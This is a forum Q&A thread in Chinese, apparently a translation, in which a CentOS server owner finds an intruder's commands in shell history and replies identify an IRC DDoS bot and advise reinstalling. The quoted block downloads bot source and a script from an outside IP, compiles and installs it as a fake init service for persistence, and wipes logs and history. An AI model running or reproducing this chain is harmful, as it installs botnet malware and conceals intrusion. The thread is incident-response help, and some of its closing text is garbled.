我们今天使用 Putty 远程登录到我们的 CentOS 服务器,在使用向上箭头浏览之前的命令时,偶然发现了以下内容:
unset HISTFILE
mkdir /usr/lib/tmp
cd /usr/lib/tmp
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh > /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &
(为清楚起见,&& 用换行符替换)
我从来没有运行过这些命令,永远!这是怎么发生的,我的服务器被黑了吗?我立即更改了我的 root 密码,但希望有人能对这里发生的事情有所了解。
我看到源代码中提到了 ddos bot,我和我的同事都非常担心!
提前致谢!
是的,你被黑了。黑客安装了一个 IRC 后门,你正在连接到这个 IRC 服务器:
bot herder 可以在您的服务器上执行任何命令。我建议立即关闭服务器并重新安装。该机器人具有一些 DDoS 攻击功能,DNS 洪水、同步洪水和 ICMP 洪水。它也适用于非常酷的 Windows。有一个非常古老的传播模块可以感染 myDoom。这看起来像一些旧的恶意软件。
无论如何,答案是肯定的,您的服务器正在或已经被入侵。
您应该立即切断与服务器的 Internet 连接,进行完整备份(请记住其他文件也可能遭到破坏),然后重新安装。
此外,您可能希望通知运行僵尸网络(或其他任何网络)的 IP 的所有者。这是RIPE whois 数据。
绝不允许通过 SSH 进行 root 登录。
你的问题的答案是:YES
听起来你已经感染了
BOT_VERSIONwhereBOT_VERSIONis#define BOT_VERSION "Linux/Unix IRC DDoS bot ver "BIN_VERSVION" by ["CRED"MZђ"CEND"]. Supported features : "FEATURES你的 Linux 防病毒软件没有选择这个吗?
我可能会在发布之前清理 C&C 机器的 IP 地址。